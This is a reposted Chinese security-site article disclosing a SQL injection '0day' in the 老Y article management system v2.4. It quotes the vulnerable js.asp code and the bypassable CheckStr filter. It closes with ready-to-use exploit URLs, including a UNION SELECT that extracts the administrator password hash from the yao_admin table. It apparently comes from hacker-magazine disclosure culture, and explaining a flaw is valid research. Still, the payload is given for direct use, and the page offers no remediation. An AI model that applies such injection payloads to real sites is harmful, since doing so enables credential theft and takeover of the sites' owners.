当前位置:七道奇文章资讯安全技术网络技术
日期:2009-06-16 14:57:00  来源:本站整理

老Y文章管理系统注射0day[网络技术]

赞助商链接



  本文“老Y文章管理系统注射0day[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

幻泉[B.S.N]  黑客防线


漏洞等级:中等
漏洞阐明:

漏洞呈目前js.asp中,我们首先看源代码.


Code:

If CheckStr(Request("ClassNo")) <> "" then
ClassNo = split(CheckStr(Request("ClassNo")),"|")
'这里是获得变量操纵checkstr过滤,但是感受仿佛没起作用.然后分成数组
on error resume next
NClassID = LaoYRequest(ClassNo(0))
NClassID1 = LaoYRequest(ClassNo(1))
'获得数组1,与数组2举行整形过滤.这里没有漏洞
End if

num = LaoYRequest(request.querystring("num"))'这里num必须>=1
.......
set rs=server.createObject("Adodb.recordset")
sql = "Select top "& num &" ID,Title,TitleFontColor,Author,ClassID,DateAndTime,Hits,IsTop,IsHot from Yao_Article Where yn = 0"

        If NclassID<>"" and NclassID1="" then
                If Yao_MyID(NclassID)="0" then
                        SQL=SQL&" and Class"
                else
                        MyID = Replace(""&Yao_MyID(NclassID)&"","|",",")
                        SQL=SQL&" and ClassID in ("&MyID&")"
                End if
        elseif NclassID<>"" and NclassID1<>"" then
                MyID = Replace(""&Request("ClassNo")&"","|",",")
                SQL=SQL&" and ClassID in ("&MyID&")"
                '这里呈现的问题classno并没做其他过滤就写入到查询
        End if
        
select case topType
        case "new" sql=sql&" order by DateAndTime desc,ID desc"
        case "hot" sql=sql&" order by hits desc,ID desc"
        case "IsHot" sql=sql&" and IsHot = 1 order by ID desc"
end select

set rs = conn.execute(sql)
if rs.bof and rs.eof then
str=str+"没有符合条件的文章"
........

-------------------------------

function.asp


Code:
function CheckStr(str)
    CheckStr=replace(replace(replace(replace(str,"<","<"),">",">"),chr(13),"")," ","")
        CheckStr=replace(replace(replace(replace(CheckStr,"'",""),"and",""),"insert",""),"set","")
    CheckStr=replace(replace(replace(replace(CheckStr,"select",""),"update",""),"delete",""),chr(34),"")
        CheckStr=replace(replace(replace(replace(replace(CheckStr,"*",""),"=",""),"or",""),"mid",""),"count","")
end function


操纵代码:
js.asp?num=1&ClassNo=1|1|1[SQL]
js.asp?num=1&ClassNo=1|1|1) union select 1,admin_pass,3,4,5,6,7,8,9 from yao_admin where id in(1  ####获得密码代码

备注:本漏洞在2.4版本测试  站长站下载地址http://down.chinaz.com/soft/23126.htm


  以上是“老Y文章管理系统注射0day[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 老Y文章管理系统 v2.5 sp2 SQL注射&Cookies拐骗漏洞及修复
  • 老Y文章管理系统注射0day
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .